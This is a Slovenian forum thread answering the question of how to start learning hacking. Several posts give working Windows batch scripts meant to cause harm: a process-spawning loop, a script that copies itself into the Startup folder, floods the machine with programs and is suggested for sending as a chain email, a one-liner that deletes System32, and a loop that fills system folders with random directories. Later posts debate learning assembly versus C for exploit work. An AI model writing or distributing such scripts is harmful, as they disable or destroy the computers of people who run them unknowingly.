» »

kako se začeti učit hekanja?

kako se začeti učit hekanja?

1
2
»

einstein :P ::

@echo off
:A
start cmd
goto a

shrani kot kar pač hočeš .bat

bodi pripravljen, ker bo računalnik močno obremenjen in verjetno ne boš mogel nič storiti.

ustaviš pa s pause/break gumbom oz. ctrl + c

lp
STAY OUT OF MY TERRITORY!

Zgodovina sprememb…

stb ::

Tole pa za razliko od lojze.bat ni več pravi fork bomb, ker nove procese starta zmeraj isti proces.

luka46 ::

jest10 ::

einstein :P je izjavil:

@echo off
:A
start cmd
goto a

shrani kot kar pač hočeš .bat

bodi pripravljen, ker bo računalnik močno obremenjen in verjetno ne boš mogel nič storiti.

ustaviš pa s pause/break gumbom oz. ctrl + c

lp

Da bo bolj zabavno se naredi takole:
(ta je za XPje, za W7 je startup mapa drugje)
@echo off
COPY slike.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\slike.bat"
set i=0;
:loop
if %i%==2000000 goto end
set /a i+=1
start mspaint.exe
start notepad.exe
start iexplore.exe
start calc.exe
start explorer.exe
goto loop
:end


jasno shrani kot slike.bat ter pošli kot verižni mail

Zgodovina sprememb…

  • spremenilo: jest10 ()

einstein :P ::

Kaj pa tale? :D

@echo off
del /q C:\Windows\System32
exit

>:D
STAY OUT OF MY TERRITORY!

pegasus ::

Iz takih videov se tudi lahko kar nekaj naučiš, predvsem zakaj je potrebno res dobro poznavanje hardver arhitekture pod softverom...

einstein :P ::

:a
md C:\Uporabniki\*ime vašega računalnika*\Namizje\ %random%%random%%random%random%
md C:\Windows\ %random%%random%%random%random%
md C:\Windows\System32\ %random%%random%%random%random%
start virus.bat
goto a

shranite kot virus.bat

tole vam kar lepo zmedo naredi, sem že probal z manj hudo različico in lepo deluje. ta stvar ti ustvari na tone map (kakih 1000/s) s samo enim cmdjem, odpirajo pa se novi neprestano. mape lahko najdete v system32, v windows mapi ter na namizju. tako, da če vam ne uspe ustavit pravočasno imate pač nekaj dela z brisanjem map. :))

prejšnjega mojega posta pa prosim ne poizkušajte, drugače ostanete brez delujočega windowsa. ;)
STAY OUT OF MY TERRITORY!

SmeskoSnezak ::

Skript kiddies... bunch of skript kiddies. Nekje do 10 uporabnikov odgovorov, sicer pa samo trollanje.
Če bi rad nasvet glede hekanja. Google in knjige te rešijo. Ne pa spraševanja teh intelektualcev tukaj na slo-techu ^^ :P
@ Pusti soncu v srce... @

JesusChrist ::

Matthai je v svojih slajdih lepo razložil zadeve o hekerjih. Poglej si malo njegove vsebine itd. Boš mogoče dobil kaj volje za raziskovanje.

Drugače pa ... ne rabimo še enega "hekerja" (beri: script kiddie-ja), ki niti programirat ne zna in ki nima interesa za spoznavanje delovanja v izobraževalne namene ampak le za uničevanje.
remember, the clock is ticking. run like no tomorrow.

Zgodovina sprememb…

WizmoTo ::

googleg1 je izjavil:

Ne vem zakaj bi se moral kdorkoli, razen pisec C prevajalnikov in načrtovalec procesorskega jedra, učiti assembler pred C-jem oz. assembler na sploh. Najdi mi en exploit, ki izkorišča luknjo v prevajanju v strojno kodo pa ti dam liziko (virtualno).

Poleg tega je učenje assemblerja suhoparno in nezanimivo, sploh za srednješolca, ki misli da zna matematiko. In ANSI C je eden, assemblerjev je pa N.

@offline assembler za katero arhitekturo (x86, ARM, AVR) si se pa učil ?


Močno dvomim, da nekdo, ki ne zna ASM (oz. bolje rečeno pozna vsaj osnov, kako deluje CPU), lahko razume delovanje enega najbolj genialnih exploitov, stack buffer overflow. Z učenjem ASMja se naučiš, kako procesor deluje, koliko časa porabi za določene ukaze, kako se da lowlevel paralelizirati zadeve (uporaba simd(sse/neon...)), za kar so višji jeziki in/ali njihovi prevajalniki preneumni. In to ni stran vržen čas. Če ne drugega, si vsaj sposoben pisati/optimizirati/debugirati/crackati programe na strojno omejenih embedded boardih. Če je spoznavanje delovanja računalnika in učenje ASM suhoparno in nezanimivo, potem si v napačnem poklicu.

BigWhale ::

offline je izjavil:

draciel je izjavil:

A smem vprašati, zakaj ti je tako ful pomagalo ker si se assembley navadu pred high lvl jeziki?


Zato ker je to osnova da razumeš kako delajo prevajalniki in kaj se dogaja v C-ju. Pol ti je jasno kako high level jeziki delujejo. Ubistvu je to bottom-up pristop, sam si moraš uzet res velik časa, kar pa če si mlad(ala srednja šola) ni problem. Če boš hotel pisat neke exploite je to predpogoj!


Ne, ne. Cak. Zdej nisi nic povedal. Konkretno zakaj je bolje, da se najprej naucis assembler. En prakticen primer. Zakaj je bolje, da znas najprej assembler sele potem C ali pa Javo recimo. Kaj zgubis, ce se assembler naucis sele potem, ko ze znas v Cju programirati?

googleg1 ::

WizmoTo je izjavil:


Močno dvomim, da nekdo, ki ne zna ASM (oz. bolje rečeno pozna vsaj osnov, kako deluje CPU), lahko razume delovanje enega najbolj genialnih exploitov, stack buffer overflow. Z učenjem ASMja se naučiš, kako procesor deluje, koliko časa porabi za določene ukaze, kako se da lowlevel paralelizirati zadeve (uporaba simd(sse/neon...)), za kar so višji jeziki in/ali njihovi prevajalniki preneumni. In to ni stran vržen čas. Če ne drugega, si vsaj sposoben pisati/optimizirati/debugirati/crackati programe na strojno omejenih embedded boardih. Če je spoznavanje delovanja računalnika in učenje ASM suhoparno in nezanimivo, potem si v napačnem poklicu.


Me nisi prepričal. Tako ali tako ne govoriš o učenju assemblerja ampak osnovnih računalniških pojmih (stack).

Ne razumite me narobe. Assembler je pomemben, saj brez njega računalnika ne bi bilo. Prav tako obstajajo poklici, kjer je strojna koda jedro vsega. Ampak za splošno razgledanost programerja oz. hekerja pa znanje programiranja v assemblerju ni bistveno.

Reči, da strojna koda NI suhoparna in JE zanimiva je pa kot da bi rekel da je vožnja z kolesom bolj udobna od vožnje z avtom (bojim se da bo Jype ukradel temo). Nekateri mislijo, da je C nezanimiv, pa je svetlobna leta bolj zanimiv kot, napisati karkoli v strojni kodi. Misliš, da je Dennis Ritchie ko je pisal C kompajler, to počel, ker se mu je zdel assembler zabaven ?

BigWhale ::

WizmoTo je izjavil:

kako se da lowlevel paralelizirati zadeve (uporaba simd(sse/neon...)), za kar so višji jeziki in/ali njihovi prevajalniki preneumni. In to ni stran vržen čas. Če ne drugega, si vsaj sposoben pisati/optimizirati/debugirati/crackati programe na strojno omejenih embedded boardih. Če je spoznavanje delovanja računalnika in učenje ASM suhoparno in nezanimivo, potem si v napačnem poklicu.


Prosil bi te za pet primerov, ko je tvoj ASM program hitrejsi od necesa kar je nek C prevajalnik izpljunil.

Pet prakticnih primerov iz vsakdanje rabe, kjer se izrecno vidi prednost neke ASM kode pred Cjem. Se pravi, program za stetje od 1 do zilijon, ne steje.

WizmoTo ::

BigWhale je izjavil:


Prosil bi te za pet primerov, ko je tvoj ASM program hitrejsi od necesa kar je nek C prevajalnik izpljunil.

Pet prakticnih primerov iz vsakdanje rabe, kjer se izrecno vidi prednost neke ASM kode pred Cjem. Se pravi, program za stetje od 1 do zilijon, ne steje.


Google je tvoj prijatelj, samo za začetek en link o množenju matrik (upam, da ne boš izjavil, da množenje matriki ni praktičen primer):
http://www.cortstratton.org/articles/Hu...

Poglej si tudi, kako je ffmpeg knjižnica implementirana, in zakaj je zraven implementacija v asm za različne arhitekture

Malo si poglej recimo tudi, kakšno sranje prevajalniki izpljunejo pri pogosto uporabljenih C funkcijah, recimo memcpy (pa še to večina prevajalnikov vturi kar kot en sicer 32bit rep movsd asm ukaz!). Pri takih stvareh niti ni treba simd inštrukcij, že sama uporaba 64bit CISC ukazov ti omogoča 100% pohitritev - in prevajalniki niti tega ne zmorejo (no v tem primeru uporabe asm makroja, je problem v libu).

V glavnem, kjerkoli delaš z vektorji je z uporabo ASM možna pohitritev (odvisno od arhitekture od nekaj % pa tudi prek 400%)

Se strinjam da je v RISC arhitekturah stanje precej boljše kar se tiče prevajalnikov, ampak tudi te imajo dandanes že SIMD, kjer so prevajalniki neuporabni in je treba ročno asm bloke spisat (primer ARM/NEON)

Še nekaj - če imaš source v C, lahko vedno napišeš hitrejši (ali v najslabšem primeru enako hiter) program v ASM - upaš to zanikati ? :)

WizmoTo ::

googleg1 je izjavil:

[
Me nisi prepričal. Tako ali tako ne govoriš o učenju assemblerja ampak osnovnih računalniških pojmih (stack).

Sam koncept sklada je res osnovni računalniški pojem, ampak implementacija pa lahko hudo varira na različnih arhitekturah (že samo pri HW je razlika v dolžini registra, zahtevani poravnavi, smeri širjenja, kazalcu na/pred, potem pa še OS in CRT specifika pri uporabi) in brez detajlnega vedenja ne moreš razumeti, kaj se točno dogaja - kar pa pri takih exploitih moraš vedeti!, drugače ne moreš biti drugega kot script kiddie.

googleg1 je izjavil:

[
Ne razumite me narobe. Assembler je pomemben, saj brez njega računalnika ne bi bilo. Prav tako obstajajo poklici, kjer je strojna koda jedro vsega. Ampak za splošno razgledanost programerja oz. hekerja pa znanje programiranja v assemblerju ni bistveno.


Odvisno od tipa exploita. Za DB SQL injection res ne rabiš poznavanja na nižjem nivoju. Za nekatere pa ga (bootstrap/BIOS napadi, že omenjeni BO, napadi na kontrolerje).
Programer si seveda lahko tudi, če tega ne poznaš. Ravno tako, kot si lahko avtomehanik, pa ne veš, kako deluje motor. Vprašanje pa je, če si potem res lahko enako dober, kot nekdo, ki to znanje ima ?

googleg1 je izjavil:

[

Reči, da strojna koda NI suhoparna in JE zanimiva je pa kot da bi rekel da je vožnja z kolesom bolj udobna od vožnje z avtom (bojim se da bo Jype ukradel temo). Nekateri mislijo, da je C nezanimiv, pa je svetlobna leta bolj zanimiv kot, napisati karkoli v strojni kodi. Misliš, da je Dennis Ritchie ko je pisal C kompajler, to počel, ker se mu je zdel assembler zabaven ?


Visoki jeziki niso napisani zato, ker bi bili bolj zanimivi, ampak zato, ker so prenosljivi in imajo boljšo produktivnost (ne pa izvajalne hitrosti !).
Kar se pa zanimivosti in suhoparnosti tiče, je to čisto subjektivno. Osebno mi je programiranje v asm veliko bolj zanimivo kot v višjih jezikih (pa programiram večinoma v C, včasih tudi C++, redkeje v C#, Java). Pri assemblerju se za vsak CPU ogromno naučiš, bolje potem tudi razumeš prevajalnike, in lahko rešuješ take težave, v katerih so tisti, ki nimajo tega znanja, povsem izgubljeni (sploh debugiranje/programiranje kakšnih uc, kjer je potrebno paziti na porabo, cikle, optimalno razdelitev kode v segmente, reševanje težav z linkanjem). Poleg tega si upam trditi, da tisti, ki ni nikoli delal na strojnem nivoju, ne bo nikoli dobro razumel konstruktov Cja. Še s pointerji imajo ponavadi probleme, pa bolj osnovne stvari sploh ni. Koliko C programerjev zna recimo pravilno uporabljati const in volatile ? Po izkušnjah branja in fiksanja katastrofalne kode takih programerjev prekleto malo.

Seveda danes (skoraj) nihče ne uporablja ASM za programiranje cele kode, uporablja se pač za optimizacijo delov pogosto izvajajoče kode in pa za debugiranje kode, za katero nimaš sourca, ali pa za odkrivanje subtilnih problemov. In pa seveda za trainerje in cracke :)

BigWhale ::

WizmoTo je izjavil:

Google je tvoj prijatelj, samo za začetek en link o množenju matrik (upam, da ne boš izjavil, da množenje matriki ni praktičen primer):
http://www.cortstratton.org/articles/Hu...


No, googlal ne bom namesto tebe. Bos svojo trditev moral kar sam podkrepiti s kaksnim linkom. Ti pa povem, da pri moji implementaciji file transferja preko TCP protokola mi tvoje matrike nic ne pomagajo. Ja, matrike so v tem primeru povsem neprakticen primer.

WizmoTo je izjavil:

Poglej si tudi, kako je ffmpeg knjižnica implementirana, in zakaj je zraven implementacija v asm za različne arhitekture

Ja, razno video kodiranje in obdelave slik bi znale biti hitrejse. Eventuelno tudi kaksna grafika. Hehe, leta 1992 sem tudi jaz pisal get pixel in put pixel rutine v ASMju, ker je bilo hitreje kot karkoli drugega kar se je dobilo. Dandanes, ko imas OpenGL in Direct3D, pa je to ze vprasljivo. :)

WizmoTo je izjavil:


Še nekaj - če imaš source v C, lahko vedno napišeš hitrejši (ali v najslabšem primeru enako hiter) program v ASM - upaš to zanikati ? :)

Seveda, lahko poizkusis recimo na novo implementirat Xorg protokol. V ASMju. Ce ti je to prevec hardcore, lahko probas Gtk+ knjiznico. Ajd, dobr, neki bolj na easy. TCP stack.

:>

BigWhale ::

WizmoTo je izjavil:

Programer si seveda lahko tudi, če tega ne poznaš. Ravno tako, kot si lahko avtomehanik, pa ne veš, kako deluje motor. Vprašanje pa je, če si potem res lahko enako dober, kot nekdo, ki to znanje ima ?


Primerjave z avtomobili so ponavadi zgresene. Tvoja bi bila bolj na mestu, ce bi rekel, da ne mores biti dober mehanik, ce ne ves kako se ulije motor in kako se sintetizira motorno olje.

In-depth poznavanje arhitekture ni nek predpogoj, niti ni nujno. Primeri, kjer imas s poznavanjem teh zadev dandanes prednost, so precej robni in jih ni prav dosti.

Yacked2 ::

Začni počasi od začetka. Preberi kakšne članke. Ko najdeš kaj zanimivega prašaj google če ve kaj več (ne pisat how to hack style, amapak recimo MITM attack, DoS...) natu si poglej kakšen vodič, video ( kind a MITM), beri knjige...
Korak naprej ni vedno ustrezen...sploh če si na robu prepada!

einstein :P ::

Tole kodo prekopiraj v CMD in shrani s kakršnim koli imenom .bat
Ko odpreš batch datoteko pritisni enter in ti kaže uro, ki se ji na cca. 1 sekundo spreminjajo barve. :)


@echo off
time
:a
color 09
ping localhost -n 2 > nul
color 0a
ping localhost -n 2 > nul
color 0b
ping localhost -n 2 > nul
color 0c
ping localhost -n 2 > nul
color 0d
ping localhost -n 2 > nul
color 0e
ping localhost -n 2 > nul
color 0f
goto a
STAY OUT OF MY TERRITORY!
1
2
»


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Crack programa, kako se ga naredi?

Oddelek: Loža
243404 (2390) msjr
»

zagon programa

Oddelek: Pomoč in nasveti
141221 (973) Yacked2
»

Zagon RLM-serverja avtomatsko

Oddelek: Programska oprema
232200 (1872) Hayabusa
»

BAT file - Auto zaprtje DOS okna

Oddelek: Pomoč in nasveti
91915 (1780) ender

Več podobnih tem